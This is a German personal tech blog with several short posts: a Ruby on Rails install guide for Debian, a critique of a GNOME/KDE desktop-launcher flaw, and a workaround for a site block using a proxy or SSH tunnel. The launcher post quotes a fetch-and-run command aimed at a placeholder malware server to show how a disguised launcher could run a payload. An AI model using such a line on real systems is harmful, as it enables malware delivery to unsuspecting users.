Domain-Weltkarten-Aktion von united-domains

United domains verschenkt eine Domain-Weltkarte an alle Blogger, die bis zum 31.03.09 einen Beitrag über diese Aktion in ihrem Blog veröffentlichen. Da ich über meinem Schreibtisch noch eine große weiße Fläche zu füllen habe, lasse ich mich da nicht lange bitten…

Weitere Infos finden sich bei united-domains.de.

(via perun.net)

Linkdump Februar 2009

Eine Liste der Seiten, die im Februar in meinen Bookmarks gelandet sind:

WordPress

CSS

Webdesign

Linux

Sonstiges

Ruby on Rails 2.2 unter Debian Lenny installieren

Hier eine kurze Anleitung, wie man RoR 2.2 unter Debian installieren kann. Besonderen Wert habe ich dabei darauf gelegt, den »Debian-Way« soweit es eben geht einzuhalten und alle Dateien, die nicht aus deb-Paketen stammen, unter /usr/local/ bzw. /var/local/ abzulegen, um sie bei Bedarf wieder sauber entfernen zu können.

Fangen wir mit den Paketen an, die direkt aus den Repositories bezogen werden können und die für die weitere Installation notwendig sind:

# aptitude install ruby libsqlite3-ruby libruby rdoc1.8 libopenssl-ruby

Die in Lenny enthaltene Version von rubygems ist leider zu alt, weswegen es manuell installiert werden muss:

# wget http://rubyforge.org/frs/download.php/45905/rubygems-1.3.1.tgz
# tar xzf rubygems-1.3.1.tgz
# cd rubygems-1.3.1
# export GEM_HOME=/var/local/lib/gems
# ruby setup.rb --prefix=/usr/local/ruby

Anm: Die aktuellste Version findet sich unter http://rubyforge.org/frs/?group_id=126.

Damit die installierten Dateien auch gefunden werden können, müssen die folgenden Zeilen in /etc/profile eingefügt werden (vor export $PATH):

if [ -d /usr/local/ruby/bin ]; then
  PATH="${PATH}:/usr/local/ruby/bin"
fi

if [ -d /usr/local/ruby/lib/ ]; then
  export RUBYLIB="${RUBYLIB}:/usr/local/ruby/lib/"
fi

if [ -d /var/local/lib/gems ]; then
  export GEM_HOME=/var/local/lib/gems

  if [ -d /var/local/lib/gems/bin ]; then
    PATH="${PATH}:/var/local/lib/gems/bin"
  fi
fi

Damit das veränderte environment zum Tragen kommt, muss man sich entweder aus- und wieder einloggen oder /etc/profile sourcen:

# . /etc/profile

Wenn man möchte, kann man noch einen Symlink für gem anlegen:

# cd /usr/local/ruby/bin/
# ln -s gem1.8 gem

Nun steht einer Installation von Rails mit Hilfe von rubygems nichts mehr im Wege:

# gem install rails

Ab hier kann man z.B. mit dem Ruby on Rails Tutorial Ruby on Rails Tutorial weitermachen.

Sicherheitslücke in Gnome und KDE

Foobar beschreibt in seinem Blog eine Sicherheitslücke, die sowohl Gnome- als auch KDE-Desktops betrifft. Das Problem besteht in den so genannten »launchers« (Starter), die dazu dienen, Verknüpfungen zu Programmen auf dem Desktop bzw. im Panel abzulegen. Es handelt sich dabei um einfache Textdateien mit folgendem Aufbau (hier auf das Wesentliche gekürzt):

[Desktop Entry]
Icon=ooo-writer
Type=Application
Exec=ooffice -writer
Name=OpenOffice.org Writer

Wird diese Datei z.B. unter dem Namen ooo-writer.desktop auf dem Desktop abgelegt, wird sie mit dem Writer-Icon und dem Text »OpenOffice.org Writer« angezeigt und startet ooffice -writer bei einem Doppelklick. So weit so gut.

Das Problem besteht darin, dass erstens die Anweisung hinter Exec= beliebigen Shellcode enthalten kann und zweitens das x-Flag (executable) nicht gesetzt sein muss, damit dieser Code zur Ausführung gebracht wird. Hinzu kommt, dass auch das Icon und der angezeigte Text beliebig manipulierbar sind und dass der Anwender keinerlei Hinweis bekommt was passiert, wenn er einen Doppelklick auf diesem Icon ausführt – außer er öffnet den Dialog »Eigenschaften«. Im Klartext heißt das, dass ein solcher Launcher ein Writer-Symbol und den Text »harmloses_Dokument.odt« anzeigen, bei einem Doppelklick aber eine Zeile wie diese ausführen kann:

bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"

Die Möglichkeiten sollten klar sein.

Sowohl auf Foobars Blogartikel als auch bei Slashdot gab es viele Reaktionen. Leider hat sich ein Großteil der anschließenden Diskussionen damit auseinandergesetzt, dass der verwendete Begriff »Virus« nicht korrekt sei (dem ich auch zustimmen würde) und dass man Anwender grundsätzlich nicht vor sich selber schützen kann. Das zentrale Problem wurde aber meines Erachtens nur unzureichend behandelt. Natürlich kann (und sollte) ein Betriebssystem (bzw. in diesem Fall eine Desktopumgebung) nicht versuchen, dem Anwender das Denken abzunehmen und wenn der User kundtut »ich möchte, dass $CODE ausgeführt wird«, dann sollte eben auch genau das passieren. Aber: eine graphische Oberfläche, die es ermöglicht, einen potenziell schädlichen Code aus beliebiger Quelle optisch als gewöhnliche Datei erscheinen zu lassen, ist in meinen Augen schlicht und ergreifend kaputt.

Das Problem ist nicht neu, sondern im Gegenteil seit 2006 bekannt und ich begreife nicht, warum die Gnome- und KDE-Entwickler nicht darauf reagieren. Was spricht dagegen, den im Launcher angegebenen Befehl nur dann auszuführen, wenn das x-Flag gesetzt ist?

Einen Schutz (etwa das Deaktivieren dieser Funktionalität) scheint es nicht zu geben, sondern es bleibt einem nur übrig, einen anderen Desktop zu verwenden oder vor dem Öffnen einer vermeintlichen Office-Datei, die man per Mail erhalten hat, dreimal hinzusehen.

(via How to write a Linux virus in 5 easy steps)

Google Gears unter Iceweasel (Debian) installieren

Ich wollte mir Google Gears auf meiner Debian-Box installieren, weil ich neugierig auf das »Turbo«-Feature von WordPress war. Die offizielle Gears-Website hat mir aber nur die lapidare Meldung Your Browser is currently not supported ausgespuckt. Keine weiteren Hinweise oder gar ein Downloadlink. Die Ursache ist, dass die User-Agent-Kennung nur auf »Firefox« hin geprüft wird und der baugleiche und eben nur anders benannte Iceweasel nicht als unterstützt erkannt wird.

Nach einigem googlen habe ich schließlich einen Link auf http://gears.google.com/terms.html?platform=linux gefunden, wo das Firefox/Iceweasel-Addon klaglos installiert werden kann.

Bin gespannt, was der »Turbo« so bringt…

IE6 Frühjahrsputz

Logo IE6 FrühjahrsputzFinn.no, Norwegens größte Website für Kleinanzeigen, hat einem der hartnäckigsten Ärgernisse des Webs den Kampf angesagt. Die Rede ist vom Internet Explorer 6, der seit Jahren die Nerven aller um Standards bemühten Webworker aufs Äußerste strapaziert. Die Seite zeigt allen IE6-Nutzern einen grün umrahmten Hinweis an, dass ihr Browser veraltet ist und bietet Links sowohl zum Update auf IE7 als auch zu alternativen Browsern an.

In einem Twitter-Post rief der Webentwickler von Finn.no, Erlend Schei, alle Webmaster großer norwegischer Sites dazu auf, seinem Beispiel zu folgen:

An alle mit Kontrolle über große norwegische Sites: Was haltet ihr von einem Frühjahrsputz, um IE6 los zu werden? Eine Woche Ermutigung auf unseren Homepages?

(Anm: Dies ist eine Übersetzung der englischen Übersetzung)

Nach kurzer Zeit haben sich eine Vielzahl großer und kleinerer Sites an der Aktion beteiligt. In einem eigens eingerichteten Wiki werden die Reaktionen aus dem virtuellen Blätterwald gesammelt. Mittlerweile haben die Wellen u.a. wired und heise erreicht. Der Code-Schnipsel, der den Hinweis auch auf der eigenen Homepage oder Blog einzufügt, ist in 4 8 10 Sprachen verfügbar.

Ich bin sehr gespannt, ob dieser Frühjahrsputz auch in Deutschland Einzug halten wird. Die Zeit des IE6 ist lange abgelaufen.

Update: Auf flickr gibt es eine beeindruckende Screenshot-Sammlung von Seiten, die sich an dieser Aktion beteiligen.

(via thatnorwegianguy.com)

Auf den Punkt gebracht

Besser kann man die aktuelle Debatte um Internetzensur nicht zusammenfassen:

»Hier sollen in aller Eile Barrikaden unter der Flagge Kinderpornos errichtet werden, weil so am wenigsten Widerstand zu erwarten ist und man außerdem die Blondine vorschicken kann, die damit Wahlkampf macht«, lautet das Fazit eines Beteiligten gegenüber heise online.

YMMD!

(via heise.de)

Userfriendly aus dem Arcor-Netz lesen

Nach wie vor sperrt Userfriendly alle Anfragen aus dem Netz von Arcor. Die Sperre wird zwar sporadisch immer mal wieder aufgehoben, was aber sehr unregelmäßig passiert.

Nun wurde von Stefan Deil gefragt, ob es einen Workaround gibt. Zwei Varianten möchte ich hier kurz vorstellen:

1. Proxy-Server

Die Sperre von Userfriendly geschieht auf Basis der IP-Adresse. Anfragen, die nicht aus dem Arcor-Netz kommen, werden ohne Probleme beantwortet. Die einfachste Möglichkeit ist daher, die Anfrage über einen Proxy zu senden, der diese dann an Userfriendly weiterleitet und die Antwort wiederum an den Browser durchreicht. Dieser Proxy muss in den Optionen des verwendeten Browsers eingetragen werden.

In einem Beitrag im Heiseforum wird z.B. ein Proxy der Piratenpartei vorgeschlagen (porn.piratenpartei.de:3128). Angeblich funktioniert selbst der Arcor-eigene Proxy (proxy.arcor-ip.de:8080), was ich aber nicht getestet habe.

Der Nachteil an diesem Ansatz ist, dass der gesamte »Surf-Traffic« nun über einen fremden Rechner geleitet wird, was man aus Gründen der Sicherheit, der eigenen Privatsphäre und/oder der Übertragungsrate nicht unbedingt möchte. Daher möchte ich noch eine zweite Möglichkeit aufzeigen.

2. ssh-Tunnel

Voraussetzung hier ist ein ssh-Zugang auf einen anderen Rechner oder Server, der außerhalb des Adressbereichs von Arcor liegt. ssh ermöglicht es, einen »Tunnel« aufzubauen und einen Port des eigenen Rechners mit diesem zu verbinden. Das Ganze hört sich komplizierter an als es ist. Unter Unix realisiert man den Tunnel mit diesem Befehl:

ssh -L 80:www.userfriendly.org:80 USER@SOME_HOST

Port 80 des eigenen (lokalen) Computers wird an den ssh-Tunnel gebunden, dessen anderes Ende mit Port 80 von www.userfriendly.org verbunden wird. Da es sich dabei um einen so genannten priviligierten Port handelt, benötigt dieser Befehl root-Rechte. USER ist natürlich durch die entsprechende Nutzerkennung zu ersetzen, mit der man sich auf dem entfernten Rechner SOME_HOST anmelden kann. Für Windows-User existiert der ssh-Client PuTTY, der das gleiche leisten sollte, mit dem ich mich aber nicht auskenne — wenn jemand mehr weiß, würde ich mich über einen entsprechenden Kommentar freuen.

Nun muss man noch dafür sorgen, dass Anfragen für Userfriendly auch an localhost und damit über den Tunnel gesendet werden. Das erreicht man am einfachsten mit folgender Zeile in der Datei /etc/hosts (unter Windows heißt die Datei auch »hosts«, ich weiß aber nicht wo sie liegt):

127.0.0.1 www.userfriendly.org

Diese sorgt dafür, dass die Adresse www.userfriendly.org auf die lokale IP des eigenen Rechners aufglöst wird. Jetzt genügt es, eben diese Adresse im Browser der Wahl aufzurufen. Eine Einschränkung gibt es aber leider dennoch: userfriendly ist über die Hosts »www« und »ars« verteilt. Da wir nur einen von beiden umleiten können, ist die Navigation auf der Seite nur eingeschränkt möglich. Prinzipiell kann man auch das in den Griff kriegen, es wird dann nur ein wenig aufwändiger.

Die zweite Variante hat den Vorteil, dass wirlich nur der Traffic von und zu Userfriendly umgeleitet wird; alle anderen Verbindungen bleiben unverändert.

PS. Dilbert und xkcd existieren auch noch… ;-)

Microsoft kündigt ODF-Unterstützung für MS Office 2007 an

Laut Software Developer Times wird Microsoft das hauseigene, im April als DIS 29500 von der ISO standardisierte Format OOXML erst in Version 14 seiner Office-Suite implementieren. Statt dessen wurde ein Update für Office 2007 angekündigt, das eine native Unterstützung von ODF bringen und im kommenden Jahr erscheinen soll.

Was bewegt Microsoft zu einem solchen Schritt nach all den Jahren, in denen MS sich standhaft dem freien und offenen Standard verschlossen hat? Zur Erinnerung: die Begründung der Redmonder, warum ein weiteres Dokumentenformat benötigt würde, war, dass der Funktionsumfang von ODF unzureichend für den Einsatz im geschäftlichen Umfeld sei. Ist er das jetzt nicht mehr oder vielleicht nie gewesen?

Zwei plausible Erklärungen fallen mir für diesen Schritt ein:

  1. Bereits seit einigen Jahren streben einige Regierungen und Verwaltungen eine Migration zu standardisierten Dokumentenfomaten an (z.B. Massachusetts). Möglicherweise wird der Druck aus dieser Richtung mittlerweile tatsächlich groß genug, Microsoft zu zwingen von seinen proprietären doc und xls Formaten abzuweichen. Gleichzeitig drängt sich mir der Eindruck auf, dass das mit aller Gewalt als Standard durchgeprügelte OOXML selbst für Microsoft zu aufwändig zu implementieren ist (das, was Office 2007 derzeit als »docx« abspeichert, hat nicht mehr viel mit dem letztendlich verabschiedeten Format zu tun). Schließlich war ja die steigende Nachfrage nach der Unterstützung standardisierter Dokumentenfomate der Anlass ein Konkurrenzprodukt zu ODF mit dem Etikett der ISO auf den Markt zu bringen.

  2. In der Vergangenheit hat Microsoft wiederholt offene Standards adaptiert und anschließend so weit nach eigenem Ermessen so weit modifiziert, dass die Kompatibilität auf der Strecke blieb (z.B. die Interpretation des IE von HTML oder LDAP, das zu Active Directory mutiert wurde). Eine MS-eigene Interpretation von ODF könnte dieses Format extrem schwächen, da andere Hersteller (die entsprechend schlecht dokumentierten) Änderungen nachvollziehen müssten, um »MS-ODF« verarbeiten zu können.

Ich bin sehr gespannt, was letztendlich passieren wird — Bewegung scheint allemal in den so festgefahrenen Markt der doc-Dateien zu kommen.

[via Slashdot]

Fachkompetenz beim 1&1 Support

Zur Zeit betreue ich den Aufbau einer Internetpräsenz für einen Kunden, der sich zu diesem Zweck Webspace bei 1&1 angemietet hat. In diesem Hosting-Paket (Homepage Business Pro) ist auch ein ssh-Zugang enthalten. Benutzername und Passwort sind im Kundenbereich schnell gefunden. Was ich aber vergeblich gesucht habe ist der Fingerprint des Hostkeys. Auf meine entsprechende Anfrage beim 1&1 Support erhielt ich diese Antwort:

den Fingerprint bekommt Ihr Client automatisch bei der ersten Verbindung mitgeteilt.

Kopf -> Tisch